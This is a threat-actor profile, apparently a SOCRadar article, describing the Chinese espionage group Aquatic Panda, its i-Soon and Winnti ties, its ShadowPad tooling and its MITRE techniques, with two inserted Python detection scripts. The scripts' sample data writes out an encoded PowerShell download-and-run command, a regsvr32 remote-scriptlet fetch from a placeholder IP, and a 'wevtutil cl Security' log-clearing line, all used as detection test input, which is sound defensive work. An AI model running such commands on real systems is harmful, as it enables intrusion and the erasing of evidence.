Dark Web Profile: Aquatic Panda
Aquatic Panda is a suspected China-based threat group focused on intelligence gathering and industrial espionage. From around 2016 to 2023, the Chinese tech company i-Soon reportedly carried out global cyber intrusions under the direction of China’s MSS and MPS. Founded in 2010, i-Soon reportedly operated multiple attack teams targeting government agencies, dissidents, religious organizations, and news outlets worldwide, becoming a key player in China’s hacker-for-hire ecosystem. Aquatic Panda has been linked to this Chinese government contractor, i-Soon.

FBI’s wanted poster for Aquatic Panda Cyber Threat Actors (FBI)
Who is Aquatic Panda?
Aquatic Panda is a suspected Chinese state-sponsored threat actor known for focusing on cyberespionage and intelligence operations. Believed to be operating under or in close coordination with China’s Ministry of State Security (MSS), the group has been tied to i-Soon, a Chinese technology contractor recently exposed for conducting offensive cyber activities on behalf of the government. The leak of internal i-Soon documents revealed that teams like Aquatic Panda were integral to China’s broader strategy of digital surveillance and strategic cyber operations.

Threat actor card for Aquatic Panda
This group has gone by many names across the cybersecurity landscape. Trend Micro refers to the group as Earth Lusca, Recorded Future tracks it as TAG-22 and later RedHotel, Microsoft labels it Charcoal Typhoon (formerly CHROMIUM), and other vendor aliases include BRONZE UNIVERSITY, Red Dev 10, BountyGlad, ControlX, Red Scylla, and FISHMONGER. Despite these differing designations, analysts agree on the group’s operational focus: long-term, persistent campaigns designed to harvest intelligence from carefully selected targets aligned with China’s strategic interests.
The group’s targets consistently overlap with those of Chinese national security objectives, and its campaigns often support state surveillance, influence operations, and digital repression beyond China’s borders.
Aquatic Panda employs tooling that closely mirrors that of the broader Winnti umbrella, yet it appears to operate independently of the Winnti Group.
The Winnti Group is a well-known Chinese state-aligned cyberespionage collective that has been active since at least 2012, with some reports tracing its activity back as far as 2007.
What are Aquatic Panda’s Targets?
The Winnti Group, associated with cyberattacks against the video game and software industries, is responsible for high-profile supply-chain compromises such as those involving CCleaner, possibly ASUS LiveUpdate, and other software used as distribution channels for trojanized code. Over time, the group expanded its targeting scope to include universities, healthcare institutions, and organizations involved in political and strategic research, particularly in Hong Kong and broader East Asia.
ESET has linked Aquatic Panda to this larger Winnti ecosystem through overlapping malware (e.g., ShadowPad, the Winnti backdoor), shared infrastructure, and common operational tradecraft. In its 2020 investigation, researchers identified campaigns involving ShadowPad and skip-2.0 against universities in Hong Kong, aimed at espionage and long-term surveillance. Even so, ESET treats Aquatic Panda as an entity distinct from the Winnti Group.
ESET’s later report on the group’s 2022 campaign demonstrated a broad international reach, with confirmed compromises spanning Asia, Europe, and North America. In Asia, victims included governmental organizations in Taiwan and Thailand. A further victim was compromised in Türkiye, though its sector remains unspecified. In Europe, the group targeted a Catholic organization in Hungary and a geopolitical think tank in France, indicating interest in ideological influence and policy insights.
Meanwhile, two distinct targets were identified in the United States: a Catholic charity operating globally and an NGO.
Notably, Trend Micro documented a case where the group targeted a Chinese trading company, highlighting that even domestic entities are not always exempt from surveillance, particularly when internal political or economic insights are at stake.
More recently, leaks from the Chinese contractor i-Soon (安洵信息), as reported by SOCRadar and others, revealed that i-Soon played a key role in managing and supporting cyber operations for China’s Ministry of State Security (MSS). i-Soon maintained multiple offensive teams and tools aligned with known threat actors, and Aquatic Panda has been linked to i-Soon through this leaked documentation. The i-Soon leaks further validate long-suspected relationships between private Chinese tech firms and APT groups such as Aquatic Panda and Winnti.

Simplified relationship map of Chinese cyber actors
This diagram illustrates the overlapping roles of i-Soon, the Winnti Group, and Aquatic Panda. While not perfectly hierarchical in reality, it reflects how i-Soon, or similar private organizations in China, serves as both a malware supplier and an operational hub, while the Winnti Group runs prominent campaigns and maintains widely shared tooling. Aquatic Panda operates as a specialized team, often under the direction of larger organizations. All are aligned with Chinese state interests.
In sum, Aquatic Panda’s targeting reflects a blend of traditional espionage, supply-chain manipulation, and ideological monitoring. Its ties to Winnti and i-Soon place it at the center of China’s evolving cyberespionage machinery, merging private contractor capabilities with state-directed objectives.
What are Aquatic Panda’s Techniques?
Aquatic Panda employs a set of techniques aimed at covert, long-term access to high-value targets. The group typically begins its intrusions by exploiting vulnerabilities in public-facing applications or by injecting malicious scripts into compromised websites to redirect victims.

An example operation model for Aquatic Panda, combined from different campaigns
Once inside a network, Aquatic Panda deploys modular malware, most notably ShadowPad, which includes capabilities such as keylogging, screenshot capture, and file exfiltration. These payloads are heavily obfuscated, decoded only in memory, and communicate with attacker infrastructure using encrypted or DNS-based channels, allowing the group to maintain stealth and persistence within targeted environments.
Initial Access & Exploitation
Aquatic Panda gains initial access primarily through vulnerability exploitation and watering hole attacks. Researchers documented the group exploiting vulnerabilities in public-facing applications and using malicious JavaScript injected into compromised websites to redirect victims to attacker-controlled infrastructure. ESET’s reporting also noted targeting of unpatched servers as an entry vector.
Use of ShadowPad
The group heavily relies on the ShadowPad backdoor, a modular malware platform commonly used by Chinese APT groups. According to researchers, ShadowPad allows attackers to load plug-ins for keylogging, screenshot capture, file retrieval, and other surveillance capabilities. Notably, Earth Lusca (Aquatic Panda) was the first group observed using a new version of ShadowPad’s obfuscation method in late 2020, which underwent further changes in early 2022. The malware is designed to be stealthy: it remains encrypted on disk and is only decoded directly in memory, making static detection difficult and indicating advanced operational security.
Command and Control (C2)
Aquatic Panda uses encrypted and stealthy communication channels for command-and-control. ShadowPad’s C2 mechanism includes custom domain generation algorithms (DGAs) and DNS-based communication. This approach enables persistence and flexible infrastructure rotation in case of detection or takedown efforts.
Post-Exploitation Activity
Once inside a network, the group typically deploys additional payloads and attempts to escalate privileges, though specific privilege escalation techniques were not detailed in the open-source reporting. Researchers note that backdoors such as ShadowPad are used for long-term access, indicating a focus on quiet persistence rather than rapid data exfiltration. During the university targeting campaigns documented in 2020, attackers used customized implants to maintain access over extended periods, suggesting that Aquatic Panda’s intrusions are methodically maintained.
Anti-Analysis and Obfuscation
Researchers highlight Aquatic Panda’s use of obfuscated shellcode loaders, while ShadowPad includes custom encryption algorithms to obfuscate code and payload behavior. Mandiant (in separate research) noted that decoding only occurs in memory, adding another layer of stealth that complicates forensic investigation.
Toolset & Malware
The group’s malware arsenal reflects both the custom tools used by Winnti actors and publicly available frameworks:

Main tools used by Aquatic Panda
Aquatic Panda’s methods emphasize stealth, persistence, and operational flexibility, hallmarks of Chinese state-aligned actors. Their use of both custom and commodity tools enables rapid adaptation to different environments and defensive technologies. The final section of this profile lists the techniques and software MITRE attributes to the group.
How to Understand the Chinese Cyber Threat Network?

China’s cyber network also includes many other APT groups, and their tooling, infrastructure, and personnel overlap with one another to some degree.
Is i-Soon still a threat after the leaks?
Yes—but it’s struggling. Despite public exposure in 2024, i-Soon is still officially operating, with multiple subsidiaries active as of early 2025. However, its workforce has shrunk by a third, it has accumulated over $1 million in debt, and it’s facing dozens of lawsuits. The company moved offices and has mainly gone silent, with no new visible cyber activity since early 2024. Once a key player in China’s contractor-driven cyber apparatus, i-Soon now appears sidelined, offering a rare look at how expendable these companies are, even after serving state interests.
Although i-Soon may be diminished, countless other firms like it remain ready to compete for state contracts, ensuring China’s cyber operations continue uninterrupted.
How are Winnti and Aquatic Panda related?
Winnti and Aquatic Panda are separate hacking groups, but they operate within the same broader Chinese cyber ecosystem. Both use shared malware platforms such as the Winnti backdoor and ShadowPad, which multiple China-linked actors have adopted over the years. Winnti is associated with large-scale operations such as supply-chain compromises and with its namesake malware toolkit. Aquatic Panda has more recently focused on espionage against NGOs (non-governmental organizations), academia, and dissident targets. Although distinct, the two groups appear to function in parallel, using overlapping infrastructure and tools under the direction of different Chinese state entities.
Who directs these groups?
Winnti is understood to align with the Ministry of State Security (MSS), which handles foreign intelligence and strategic espionage. On the other hand, Aquatic Panda has been linked to the Ministry of Public Security (MPS), China’s domestic security and policing authority. Both agencies contract or direct i-Soon to execute specific cyber operations, suggesting that i-Soon serves or once served as a common facilitator or outsourcing hub for multiple branches of China’s state security apparatus.
What is China’s broader cyber strategy?
China’s cyber strategy relies heavily on a hybrid model that combines:
- State agencies setting strategic priorities;
- Contractors like i-Soon developing tools and executing attacks;
- The reuse and sharing of malware platforms across multiple groups.
This structure provides scalability, flexibility, and plausible deniability. Rather than centralizing all operations, China distributes its cyber capabilities through a network of affiliated actors sharing goals, infrastructure, and personnel.
Why does this matter geopolitically?
This model allows China to conduct widespread cyber espionage and influence operations efficiently and with a degree of separation from direct government attribution. Targets include foreign ministries, defense organizations, dissidents, universities, tech companies, and NGOs. These campaigns both collect intelligence and suppress threats to the Chinese Communist Party’s global and domestic control.
How to Defend Against Aquatic Panda?
Defending against Aquatic Panda requires a layered and proactive approach, tailored to the group’s stealthy, persistent nature and use of modular, memory-resident malware like ShadowPad. Their campaigns are often extended over months, involving stealthy data gathering, careful lateral movement, and long-term command-and-control (C2) operations, making early detection and consistent monitoring critical.
1. Securing Initial Access Points
Aquatic Panda often exploits internet-facing services and injects malicious scripts into compromised websites to redirect victims.
- Regularly patch exposed applications, including web servers, email gateways, and VPNs.
- Use web application firewalls to help block exploit attempts.
- Monitor for signs of watering hole activity, such as script injections or redirection chains from legitimate websites.
2. Detection of Fileless and Modular Malware
The group uses memory-resident malware like ShadowPad, whose payload stays encrypted on disk and is decoded only in memory, so file-based scanning sees little of value.
- Deploy endpoint detection solutions that focus on behavior and memory analysis.
- Monitor trusted binaries like rundll32, mshta, or regsvr32 for execution of unexpected payloads.
- Pay close attention to unusual outbound DNS or HTTP connections that may indicate encrypted command-and-control traffic.
APT campaigns typically involve consistent and low-volume outbound data transfers. Continuous monitoring of outbound network flows is crucial to detect this behavior.
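As an added illustration of the detection guidance above (example code, not from the original article or any vendor), the following Python script runs the behavioral checks from points 1 and 2 over a handful of constructed Sysmon-style process-creation and DNS records: rundll32 loading a DLL from outside the system directories (the keylogger technique listed in the MITRE table below), the regsvr32 remote-scriptlet pattern, mshta pulling remote script, Base64-encoded PowerShell, and DGA-like or tunnel-like DNS query names of the kind ShadowPad’s DNS C2 produces. The record layout, field names, thresholds, host names, and the 198.51.100.7 address are assumptions chosen for this example.

```python
import base64
import math
import re
from collections import Counter, defaultdict

# Assumption for this example: DLLs legitimately loaded by rundll32 live here.
SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")


def shannon_entropy(s: str) -> float:
    """Bits of entropy per character; random DGA labels score near log2(alphabet size)."""
    if not s:
        return 0.0
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in Counter(s).values())


def decode_encoded_powershell(cmdline: str):
    """Return the decoded -EncodedCommand payload (Base64 of UTF-16LE) or None."""
    m = re.search(r"(?i)-e(?:nc(?:odedcommand)?)?\s+([A-Za-z0-9+/=]{16,})", cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def flag_process_event(ev: dict) -> list:
    """Reasons a process-creation record looks like LOLBin proxy execution or encoded PowerShell."""
    exe = ev.get("image", "").lower().rsplit("\\", 1)[-1]
    cmd = ev.get("cmdline", "")
    reasons = []
    if exe == "rundll32.exe":
        # T1218.011: the loader/keylogger DLL is the first argument; outside the system
        # directories it deserves a look.
        m = re.search(r'(?i)rundll32(?:\.exe)?"?\s+"?([^",]+)', cmd)
        dll = m.group(1).strip().lower() if m else ""
        if dll and not dll.startswith(SYSTEM_DIRS):
            reasons.append(f"rundll32 loading DLL outside system directories: {dll}")
    elif exe == "regsvr32.exe":
        if re.search(r"(?i)/i:https?://", cmd) or "scrobj.dll" in cmd.lower():
            reasons.append("regsvr32 squiblydoo pattern (remote scriptlet via scrobj.dll)")
    elif exe == "mshta.exe":
        if re.search(r"(?i)https?://|javascript:|vbscript:", cmd):
            reasons.append("mshta executing remote or inline script")
    elif exe in ("powershell.exe", "pwsh.exe"):
        decoded = decode_encoded_powershell(cmd)
        if decoded is not None:
            reasons.append(f"encoded PowerShell: {decoded.strip()[:60]}")
    return reasons


def flag_dns_event(ev: dict) -> list:
    """Reasons a DNS query looks like DGA or DNS-tunnel C2 (ShadowPad supports both)."""
    labels = ev.get("query", "").lower().rstrip(".").split(".")
    if len(labels) < 3:  # bare second-level domains are not interesting here
        return []
    sub = labels[0]
    reasons = []
    if len(sub) >= 30:
        reasons.append(f"long subdomain label ({len(sub)} chars) suggests DNS tunnelling")
    ent = shannon_entropy(sub)
    if len(sub) >= 12 and ent > 3.8:
        reasons.append(f"high-entropy subdomain ({ent:.2f} bits) suggests DGA")
    if ev.get("rtype") == "TXT":
        reasons.append("TXT lookup (a common C2 data channel, rare from user endpoints)")
    return reasons


def scan(events: list) -> dict:
    """Group hits per host: LOLBin execution and odd DNS on the same host is far stronger
    evidence than either signal alone."""
    hits = defaultdict(list)
    for ev in events:
        reasons = flag_process_event(ev) if ev["type"] == "process" else flag_dns_event(ev)
        if reasons:
            hits[ev["host"]].extend(reasons)
    return dict(hits)


# Constructed sample telemetry (not real logs). The encoded command is built inline so the
# example stays self-contained.
ENC = base64.b64encode(
    "IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/s')".encode("utf-16-le")
).decode()
SAMPLE_EVENTS = [
    {"type": "process", "host": "ws01", "image": "C:\\Windows\\System32\\rundll32.exe",
     "cmdline": "rundll32.exe C:\\ProgramData\\Adobe\\log.dll,Start"},
    {"type": "process", "host": "ws01", "image": "C:\\Windows\\System32\\rundll32.exe",
     "cmdline": "rundll32.exe C:\\Windows\\System32\\shell32.dll,Control_RunDLL"},
    {"type": "process", "host": "ws02", "image": "C:\\Windows\\System32\\regsvr32.exe",
     "cmdline": "regsvr32 /s /n /u /i:http://198.51.100.7/a.sct scrobj.dll"},
    {"type": "process", "host": "ws02",
     "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "cmdline": "powershell.exe -nop -w hidden -enc " + ENC},
    {"type": "dns", "host": "ws01", "query": "k3j9x2qpl7zm4vwa8tyc.example-cdn.net", "rtype": "A"},
    {"type": "dns", "host": "ws03", "query": "www.microsoft.com", "rtype": "A"},
]

if __name__ == "__main__":
    for host, reasons in scan(SAMPLE_EVENTS).items():
        print(host)
        for r in reasons:
            print("  -", r)
```

The thresholds are starting points, not tuned values: an entropy cut-off near 3.8 bits catches random-looking labels but also some CDN and telemetry hostnames, so in production pair the DNS check with the process check on the same host, as scan() does by grouping hits per host, and allowlist known CDN domains before alerting.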
3. Containing Lateral Movement and Privilege Escalation
Once inside a network, the group attempts to move laterally and maintain long-term access.
- Apply least privilege principles to user and service accounts.
- Enforce multi-factor authentication on all administrative access points.
- Segment critical systems and environments to limit pivoting opportunities.
- Audit and alert on the use of RDP, SMB, WMI, or SSH in unexpected contexts.
4. Integrating Threat Intelligence with SOCRadar
Real-time threat intelligence helps organizations anticipate and respond to new tools and infrastructure used by Aquatic Panda.
- Ingest up-to-date feeds from sources such as MITRE ATT&CK and open-source sharing platforms like MISP.
- Use SOCRadar to streamline data feeds into one platform:
  - Track Indicators of Compromise and threat actor infrastructure
  - Enrich detection rules with context-specific TTPs
  - Map ShadowPad infections and associated malware
- Proactively hunt for signs of compromise within your environment.
In short, defending against Aquatic Panda means building visibility not just at the endpoint or network level, but across behaviors, outbound communications, and malware telemetry. With the right combination of patching discipline, behavioral detection, network monitoring, and threat intelligence integration, organizations can detect these slow-moving, stealth-driven threats before they achieve persistence or exfiltrate sensitive data.
How Can SOCRadar Help?
SOCRadar provides a comprehensive suite of tools that can significantly enhance an organization’s ability to detect, understand, and defend against advanced persistent threats like Aquatic Panda. Given the group’s stealthy tactics, modular malware (such as ShadowPad), and infrastructure obfuscation, real-time threat intelligence and contextual analysis are critical.
Here’s how SOCRadar can support your defense strategy:
- Threat Intelligence Enrichment
SOCRadar Threat Actor Intelligence continuously monitors the dark web, surface web, and deep web for Indicators of Compromise (IOCs), tools, and TTPs used by Aquatic Panda and other Chinese APTs. This includes:
- Updated threat actor profiles and malware associations (e.g., ShadowPad, Winnti tools)
- Real-time tracking of IP addresses, domains, hashes, and C2 infrastructure
- Correlation with MITRE ATT&CK techniques for detection rule enhancement

Threat Actor Intelligence by SOCRadar
- Early Warning with Attack Surface Management
By mapping your organization’s exposed digital assets, SOCRadar Attack Surface Management helps you detect vulnerabilities before threat actors do.
- Continuous monitoring of external assets
- Alerts on exploitable misconfigurations and unpatched services
- Insights into how actors like Aquatic Panda might identify and exploit your infrastructure

SOCRadar’s Attack Surface Management, Company Vulnerabilities
- Digital Risk Protection
Aquatic Panda often targets NGOs, universities, and charities—sectors that can be under-resourced in cybersecurity.
- SOCRadar monitors for leaked credentials, impersonation attempts, and malicious references to your brand across underground forums and marketplaces
- Early alerts enable faster response to account takeovers or data leaks
Check out SOCRadar’s Free Edition!
In Summary
Aquatic Panda is a Chinese state-sponsored cyberespionage group that operates within a wider network of government-linked teams and private contractors. Its activities reflect China’s modern cyber strategy, where national objectives are pursued through a decentralized but coordinated system of outsourcing and tool sharing.
Rather than acting alone, Aquatic Panda is part of an ecosystem where multiple actors overlap in infrastructure, malware use, and targeting priorities. The group plays a role in campaigns focused on long-term intelligence gathering, surveillance, and strategic advantage.
The exposure of contractor i-Soon has provided rare insight into how groups like Aquatic Panda function, revealing the structure behind China’s cyber operations. Recognizing these patterns is critical to understanding not just the technical threats, but the strategic intent behind them.
MITRE ATT&CK TTPs of Aquatic Panda
Techniques Used by Aquatic Panda as provided by MITRE:
ID | Name | Use |
T1087 | Account Discovery | Aquatic Panda ran the Linux last command to identify recently logged-in users. |
T1595.002 | Active Scanning: Vulnerability Scanning | Used public DNS logging services to find servers vulnerable to Log4j (CVE-2021-44228). |
T1560.001 | Archive Collected Data: Archive via Utility | Compressed files and dumps with WinRAR and 7-Zip before exfiltration. |
T1059.001 | Command and Scripting Interpreter: PowerShell | Downloaded scripts and executed Base64 encoded commands in PowerShell. |
T1059.003 | Command and Scripting Interpreter: Windows Command Shell | Attempted to run Bash commands via cmd /C on Windows. |
T1059.004 | Command and Scripting Interpreter: Unix Shell | Used malicious shell scripts post-SSH access to install Linux versions of Winnti. |
T1543.003 | Create or Modify System Process: Windows Service | Created Windows services mimicking legitimate ones for persistence. |
T1005 | Data from Local System | Captured Windows security logs using wevtutil. |
T1574.001 | Hijack Execution Flow: DLL Search Order Hijacking | Used search-order hijacking to load malicious files and DLLs into trusted processes. |
T1574.006 | Hijack Execution Flow: Dynamic Linker Hijacking | Modified ld.so preload in Linux for Winnti persistence. |
T1562.001 | Impair Defenses: Disable or Modify Tools | Attempted to disable EDR tools. |
T1070.001 | Indicator Removal: Clear Windows Event Logs | Cleared Windows Event Logs to evade detection. |
T1070.003 | Indicator Removal: Clear Command History | Cleared shell command history in Linux. |
T1070.004 | Indicator Removal: File Deletion | Deleted malware from compromised hosts. |
T1105 | Ingress Tool Transfer | Downloaded malware onto compromised systems. |
T1654 | Log Enumeration | Enumerated authentication logs before selective deletion for evasion. |
T1036.004 | Masquerading: Masquerade Task or Service | Created services like “Windows User Service” to blend in. |
T1036.005 | Masquerading: Match Legitimate Name or Location | Renamed or relocated binaries to evade detection. |
T1112 | Modify Registry | Enabled RestrictedAdmin mode for pass-the-hash via RDP. |
T1027.010 | Obfuscated Files or Information: Command Obfuscation | Encoded PowerShell commands in Base64. |
T1588.001 | Obtain Capabilities: Malware | Acquired and used njRAT. |
T1588.002 | Obtain Capabilities: Tool | Acquired and used Cobalt Strike. |
T1003.001 | OS Credential Dumping: LSASS Memory | Attempted credential theft from LSASS memory. |
T1021 | Remote Services | Used remote scheduled tasks to deploy malware. |
T1021.001 | Remote Services: Remote Desktop Protocol | Moved laterally via RDP using stolen credentials. |
T1021.002 | Remote Services: SMB/Windows Admin Shares | Enabled lateral movement using admin shares. |
T1021.004 | Remote Services: SSH | Used SSH with stolen credentials for lateral movement. |
T1518.001 | Software Discovery: Security Software Discovery | Searched for third-party EDR software. |
T1218.011 | System Binary Proxy Execution: Rundll32 | Used rundll32.exe to execute a malicious keylogger DLL. |
T1082 | System Information Discovery | Ran native OS commands to assess privileges and system info. |
T1033 | System Owner/User Discovery | Collected info on logged-in users. |
T1007 | System Service Discovery | Searched for services related to EDR. |
T1550.002 | Use Alternate Authentication Material: Pass the Hash | Modified registry for RestrictedAdmin, enabling hash-based RDP login. |
T1078.002 | Valid Accounts: Domain Accounts | Gathered valid domain credentials for lateral movement. |
T1047 | Windows Management Instrumentation | Used WMI for lateral movement. |
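The following Python hunt, added here as an example and not part of the original article or MITRE’s data, turns the containment advice in section 3 of the defense guidance above and several rows of this table into concrete checks over Windows event records: RDP logons (type 10) and privileged network logons (type 3, the SMB/WMI/scheduled-task path) from hosts other than a sanctioned jump box, the DisableRestrictedAdmin registry change that enables pass-the-hash over RDP (T1112, T1550.002), shells spawned by WmiPrvSE.exe (T1047), wevtutil clearing event logs (T1070.001), and new services that borrow Windows-style names or run from unusual paths (T1543.003, T1036.004). The event records, host names, jump-host address, and admin account list are constructed assumptions; the field names follow the usual Security, Sysmon, and System log fields, but the record layout is this example’s own.

```python
import re
from collections import defaultdict

# Assumptions for this example: where admin sessions are expected to originate, which
# accounts count as privileged, and where legitimate service binaries live.
ADMIN_JUMP_HOSTS = {"10.0.0.5"}
ADMIN_ACCOUNTS = {"administrator", "svc-backup"}
SERVICE_DIRS = ("c:\\windows\\", "c:\\program files\\", "c:\\program files (x86)\\")


def check_logon(ev: dict) -> list:
    """Security 4624: RDP (type 10) from a non-jump host, or a privileged network logon
    (type 3) from a non-jump host (T1021.001, T1021.002, T1078.002)."""
    f = ev["fields"]
    src = f.get("IpAddress", "-")
    user = f.get("TargetUserName", "").lower()
    lt = f.get("LogonType")
    if src in ADMIN_JUMP_HOSTS or src.startswith(("-", "127.", "::1")):
        return []
    if lt == "10":
        return [f"RDP logon as {user} from non-jump-host {src}"]
    if lt == "3" and user in ADMIN_ACCOUNTS:
        return [f"privileged network logon as {user} from non-jump-host {src}"]
    return []


def check_registry(ev: dict) -> list:
    """Sysmon 13: DisableRestrictedAdmin set to 0 turns on RestrictedAdmin RDP, which accepts
    an NTLM hash instead of a password (T1112, T1550.002)."""
    f = ev["fields"]
    if (f.get("TargetObject", "").lower().endswith("\\control\\lsa\\disablerestrictedadmin")
            and f.get("Details", "").endswith("0x00000000)")):
        return ["RestrictedAdmin mode enabled via registry (pass-the-hash over RDP)"]
    return []


def check_process(ev: dict) -> list:
    """Sysmon 1 / Security 4688: shells spawned by the WMI provider host (T1047) and event
    log clearing with wevtutil (T1070.001)."""
    f = ev["fields"]
    parent = f.get("ParentImage", "").lower().rsplit("\\", 1)[-1]
    image = f.get("Image", "").lower().rsplit("\\", 1)[-1]
    cmd = f.get("CommandLine", "")
    out = []
    if parent == "wmiprvse.exe" and image in ("cmd.exe", "powershell.exe", "rundll32.exe"):
        out.append(f"{image} spawned by WmiPrvSE.exe (remote WMI execution)")
    if image == "wevtutil.exe" and re.search(r"(?i)\b(cl|clear-log)\b", cmd):
        out.append(f"event log cleared: {cmd}")
    return out


def check_service(ev: dict) -> list:
    """System 7045: a new service with a Windows-style name that runs from outside the
    Windows directory, or any service installed from an unusual path (T1543.003, T1036.004)."""
    f = ev["fields"]
    name = f.get("ServiceName", "")
    path = f.get("ImagePath", "").strip('"').lower()
    if re.match(r"(?i)^windows\s", name) and not path.startswith("c:\\windows\\"):
        return [f"service '{name}' imitates a Windows service but runs {path}"]
    if not path.startswith(SERVICE_DIRS):
        return [f"service '{name}' installed from unusual path {path}"]
    return []


CHECKS = {4624: check_logon, 13: check_registry, 1: check_process,
          4688: check_process, 7045: check_service}


def hunt(events: list) -> dict:
    """Return {host: [reasons]}; a host with hits from several checks is triaged first."""
    findings = defaultdict(list)
    for ev in events:
        reasons = CHECKS.get(ev["event_id"], lambda _ev: [])(ev)
        if reasons:
            findings[ev["host"]].extend(reasons)
    return dict(findings)


# Constructed sample events (not real logs).
SAMPLE_EVENTS = [
    {"host": "fs01", "event_id": 4624, "fields": {
        "LogonType": "10", "TargetUserName": "Administrator", "IpAddress": "10.0.3.44"}},
    {"host": "fs01", "event_id": 4624, "fields": {
        "LogonType": "10", "TargetUserName": "Administrator", "IpAddress": "10.0.0.5"}},
    {"host": "fs01", "event_id": 13, "fields": {
        "TargetObject": "HKLM\\System\\CurrentControlSet\\Control\\Lsa\\DisableRestrictedAdmin",
        "Details": "DWORD (0x00000000)"}},
    {"host": "ws07", "event_id": 1, "fields": {
        "ParentImage": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe",
        "Image": "C:\\Windows\\System32\\cmd.exe", "CommandLine": "cmd.exe /c whoami"}},
    {"host": "ws07", "event_id": 1, "fields": {
        "ParentImage": "C:\\Windows\\System32\\cmd.exe",
        "Image": "C:\\Windows\\System32\\wevtutil.exe", "CommandLine": "wevtutil cl Security"}},
    {"host": "ws07", "event_id": 7045, "fields": {
        "ServiceName": "Windows User Service", "ImagePath": "C:\\ProgramData\\wus\\wus.exe"}},
    {"host": "ws09", "event_id": 7045, "fields": {
        "ServiceName": "Sysmon64", "ImagePath": "C:\\Windows\\Sysmon64.exe"}},
    {"host": "ws09", "event_id": 4624, "fields": {
        "LogonType": "3", "TargetUserName": "jdoe", "IpAddress": "10.0.3.44"}},
]

if __name__ == "__main__":
    for host, reasons in hunt(SAMPLE_EVENTS).items():
        print(host)
        for r in reasons:
            print("  -", r)
```

The jump-host and admin-account allowlists are what keep this usable: logon type 3 is ordinary file-share traffic for normal users, so the network-logon check only fires for privileged accounts, while any RDP session that did not come through the jump box is worth a ticket. The RestrictedAdmin check looks for the value being set to 0 specifically, because that is the change that lets a stolen NTLM hash open an RDP session.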
Software Used by Aquatic Panda as provided by MITRE:
ID | Name | Use |
S0154 | Cobalt Strike | Used for multiple techniques, including PowerShell execution, service creation, credential dumping, masquerading, lateral movement (RDP/SMB/SSH), and evasion. |
S0385 | njRAT | Used for PowerShell commands, keylogging, RDP access, credential theft, file deletion, and exfiltration. |
S0596 | ShadowPad | Used as a remote access tool leveraging DGA, DNS protocols, and obfuscation methods. |
S0645 | Wevtutil | Used to extract and clear Windows event logs. |
S0430 | Winnti for Linux | Deployed in Linux environments for encrypted C2, rootkit functions, and fileless storage. |
S0141 | Winnti for Windows | Used for persistence, credential access, and encrypted communication, along with masquerading and registry manipulation. |
Article Link: https://socradar.io/dark-web-profile-aquatic-panda/